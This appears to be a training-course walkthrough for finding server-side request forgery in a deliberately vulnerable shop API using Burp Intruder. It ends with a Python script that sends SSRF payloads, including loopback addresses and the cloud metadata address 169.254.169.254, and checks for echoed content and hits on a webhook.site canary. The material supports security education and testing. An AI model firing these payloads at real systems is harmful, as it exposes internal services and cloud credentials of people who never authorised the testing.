# Testing for SSRF

1. Using either Postman or the web browser, proxy the requests you are targeting through Burp Suite.
2. Next, send the request over to Repeater to establish what a typical (baseline) response looks like; later anomalies are measured against this.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FTCMwRe7Lxl1ikw5FOSD9%2FIIcdakknQ7y3KjFakNwZ_ssrf5.webp?alt=media&#x26;token=480e826c-d5ea-4a6d-9bb2-58ae7e0311e5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FLi2IqDmcIG3o8Pcbwp8f%2FmQzAVhkrTO2Rfoumy9Rt_ssrf6.PNG?alt=media&#x26;token=b1f329ff-01c9-4d3a-b9c3-f4a9dfe5a633" alt=""><figcaption></figcaption></figure>

3. In the case of the return\_order request, we are able to return an item once. If we attempt to return the item twice then we will receive a response that the item has already been returned.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FHNxOdVKZfGrIFi0DlR52%2FyCTiwfUTTvCKxvKjQGmo_ssrf7.webp?alt=media&#x26;token=d1b48eb8-01ea-40dc-aa45-85b5fac062c3" alt=""><figcaption></figcaption></figure>

4. To test this request we need a valid order\_id, and because each order can only be returned once, every attack request consumes one. So we will need to purchase several items to have enough order\_ids for several return requests. Use the POST /workshop/api/shop/orders request to purchase several items. If you need to increase your account balance, return to the Mass Assignment exploit. Purchase enough items that you can attempt several attacks.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FX82PqPj2mhQGcT6W80De%2FMg93ujzSVyb0MeTJFXcw_ssrf8.webp?alt=media&#x26;token=ad361ec0-9716-4d00-9d68-de89ba2319aa" alt=""><figcaption></figcaption></figure>

5. To test this successfully we will need to change the attack type to Pitchfork. Pitchfork walks through each payload set in parallel, pairing the first payload of set 1 with the first of set 2, the second with the second, and so on (unlike Cluster bomb, which tries every combination and would burn through our order\_ids). For this request, we want to pair a valid order\_id with an SSRF payload, so each request uses a fresh order\_id while cycling through the different attack attempts.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2Fb5nnrhsAevAVSDgkjrfd%2FhIDoWht0RfWW60zFfSdT_ssrf9.PNG?alt=media&#x26;token=9abd5054-9a1f-4174-a4ce-af44d454345a" alt=""><figcaption></figcaption></figure>

6. Set the first payload to valid order\_id numbers.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FhUx8VToFkBpBlpSt2vSY%2FYGjcoz6XSxmzhQ5KK0iC_ssrf10.webp?alt=media&#x26;token=cddb680c-1119-46ff-ae60-94f14ada64ab" alt=""><figcaption></figcaption></figure>

Set the second payload set to potentially interesting URLs, including your webhook.site URL. For additional SSRF payload ideas (loopback and internal addresses, alternative encodings, and so on) check out [PayloadAllTheThings SSRF List](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery).

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FtgIjoCrnX5OeTD4iuKxQ%2FJ6R516giR0G2dLNZGO9B_ssrf11.PNG?alt=media&#x26;token=9001d4e9-4476-4c9e-8ac6-5c289c40ee94" alt=""><figcaption></figcaption></figure>

7. Review the results. Look for anomalies (differing status codes or response lengths) and any indication within the response that we were able to control the remote resource fetched by the server. In this case, there is no such indication in the responses.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2F6lDD9op9tvKzs33b4Sco%2FZ79Q0RK9Q4mKQa09HsF3_ssrf12.webp?alt=media&#x26;token=7a3f6eaf-7218-4632-b1fb-46fc30a191a3" alt=""><figcaption></figcaption></figure>

Next, check webhook.site to see whether a blind SSRF attack was successful. Again, our URL was never requested, so this parameter does not appear to be vulnerable. Notice that the request counter shows 0/500 and the message "Waiting for first request...".

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FKR9Y9Zdw45VmVy5pvysI%2FDQe3MF8aThyrpztmuWZy_ssrf14.webp?alt=media&#x26;token=465e8c49-6c7c-4b89-b355-15a2b065e59b" alt=""><figcaption></figcaption></figure>

Let's try this out on the contact\_mechanic request. Set the attack position on the URL parameter, copy and paste the URL payloads you used previously, and start the attack. Review the results and see if there is anything interesting.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FMex9pgwaGjcX7YrgSbS4%2FrCAq7jpJRwabZ2rzmXVH_ssrf15.PNG?alt=media&#x26;token=2480e6f5-1cc2-4c8e-a172-4aed8d304df8" alt=""><figcaption></figcaption></figure>

Sure enough, the localhost requests fail, but the other URLs are fetched successfully. Reviewing for anomalies, we can see a variety of status codes and response lengths, which is exactly the signal we were looking for. Opening the responses from the successful requests shows that the content of the remote resources we requested was returned to us in the API response: this is a full-response (non-blind) SSRF.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FdvNMUYHxe7sjvEIwvRBK%2FwrsbVrSBRrmtndHVIgfd_ssrf16.webp?alt=media&#x26;token=64752b19-213c-4367-89ad-205b206e7843" alt=""><figcaption></figcaption></figure>

We can also confirm that the request originated from the server rather than from our own machine by visiting our webhook.site page: the request has been logged, and its source IP belongs to the API host, not to us.

<figure><img src="https://825333096-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrbHTUw6JmYWHWgF1IhRj%2Fuploads%2FGDrt2mKr4RQy4K6YNsnr%2FWtZCOd2TStefkvaIIhYK_ssrf13.webp?alt=media&#x26;token=82a5d308-d442-4e7f-b55d-b5a7171e70e6" alt=""><figcaption></figcaption></figure>

Congratulations, you have successfully exploited an SSRF vulnerability! Returning to the Facebook SSRF bounty guideline, this is an instance where the SSRF is in production, the response is returned to us, and we have evidence (the webhook.site hit) that the server made the request on our behalf. In other words, maximum rewards!
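The same workflow, scripted. This is an added example and not code from the course or from the target application: it reproduces the Intruder steps above (pair each valid order\_id with one SSRF payload the way Pitchfork does, send the requests, then scan the results for anomalies and count hits on the out-of-band listener). The endpoint path, JSON field names, canary token and the simulated responses in `demo_sender` are assumptions; swap in the request you captured in Burp before running it against a real target.

```python
"""Pitchfork-style SSRF probing and result triage (added example, not from the course)."""
import json
from collections import Counter
from dataclasses import dataclass
from urllib import request as urlrequest
from urllib.error import HTTPError
from urllib.parse import urlparse

# --- constructed inputs (assumptions, not taken from the original page) ----
VALID_ORDER_IDS = [1, 2, 3, 4, 5]                       # obtained by placing orders first
CANARY_TOKEN = "00000000-0000-0000-0000-000000000000"   # placeholder webhook.site token
CANARY_URL = f"https://webhook.site/{CANARY_TOKEN}"
SSRF_PAYLOADS = [
    "http://localhost/",
    "http://127.0.0.1/",
    "http://169.254.169.254/latest/meta-data/",
    CANARY_URL,
    "http://example.com/",
]
# Strings that only show up if the server echoed a fetched resource back to us.
ECHO_MARKERS = ("<html", "<!doctype", "ami-id", "instance-id")


@dataclass
class Probe:
    order_id: int
    url: str


@dataclass
class Result:
    probe: Probe
    status: int
    body: str


def pitchfork(order_ids, payloads):
    """Burp 'Pitchfork': walk both payload sets in lockstep, so each valid
    order_id is spent on exactly one SSRF payload. 'Cluster bomb' would try
    every combination and burn through the order_ids."""
    return [Probe(o, u) for o, u in zip(order_ids, payloads)]


def live_sender(base_url, path="/workshop/api/merchant/contact_mechanic", token=None):
    """Return a sender that POSTs to the real API with urllib.
    Path and field names are hypothetical; adjust to the captured request."""
    def send(probe):
        body = json.dumps({"order_id": probe.order_id, "mechanic_api": probe.url}).encode()
        headers = {"Content-Type": "application/json"}
        if token:
            headers["Authorization"] = f"Bearer {token}"
        req = urlrequest.Request(base_url + path, data=body, headers=headers, method="POST")
        try:
            with urlrequest.urlopen(req, timeout=15) as resp:
                return Result(probe, resp.status, resp.read().decode(errors="replace"))
        except HTTPError as e:  # a 4xx/5xx body is still worth reading
            return Result(probe, e.code, e.read().decode(errors="replace"))
    return send


def demo_sender(probe):
    """Constructed stand-in for the live API (assumption): refuses loopback and
    link-local targets, returns nothing for the canary, echoes public pages."""
    host = urlparse(probe.url).hostname or ""
    if host in ("localhost", "127.0.0.1") or host.startswith("169.254."):
        return Result(probe, 500, '{"message":"connection refused"}')
    if host == "webhook.site":
        return Result(probe, 200, '{"response":""}')
    return Result(probe, 200, "<!doctype html><html><title>Example Domain</title></html>")


def run_attack(probes, send):
    return [send(p) for p in probes]


def triage(results):
    """What you do by eye in the Intruder table: the most common (status,
    length) pair is the baseline; report anything else, plus any body that
    echoes fetched content (that would be a full-response SSRF)."""
    def sig(r):
        return (r.status, len(r.body))
    baseline = Counter(sig(r) for r in results).most_common(1)[0][0]
    findings = []
    for r in results:
        reasons = []
        if sig(r) != baseline:
            reasons.append(f"status/length {sig(r)} differs from baseline {baseline}")
        if any(m in r.body.lower() for m in ECHO_MARKERS):
            reasons.append("response echoes the fetched resource")
        if reasons:
            findings.append((r.probe.url, reasons))
    return baseline, findings


def webhook_hits(token=CANARY_TOKEN):
    """Count requests that reached the listener via the webhook.site API
    (assumed endpoint and JSON shape: GET /token/<token>/requests -> {"data": [...]}).
    No hits and no echo: probably not vulnerable. Hits but no echo: blind SSRF."""
    with urlrequest.urlopen(f"https://webhook.site/token/{token}/requests", timeout=15) as resp:
        return len(json.load(resp).get("data", []))


if __name__ == "__main__":
    probes = pitchfork(VALID_ORDER_IDS, SSRF_PAYLOADS)
    baseline, findings = triage(run_attack(probes, demo_sender))
    print("baseline:", baseline)
    for url, reasons in findings:
        print(url, "->", "; ".join(reasons))
```

Against the simulated API the loopback and metadata probes all share one (status, length) signature and become the baseline, while the canary and example.com probes stand out, with only the latter echoing content. On a real target, replace `demo_sender` with `live_sender(...)` and call `webhook_hits()` afterwards: a canary hit without any echo is the blind case the return\_order test above was checking for.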
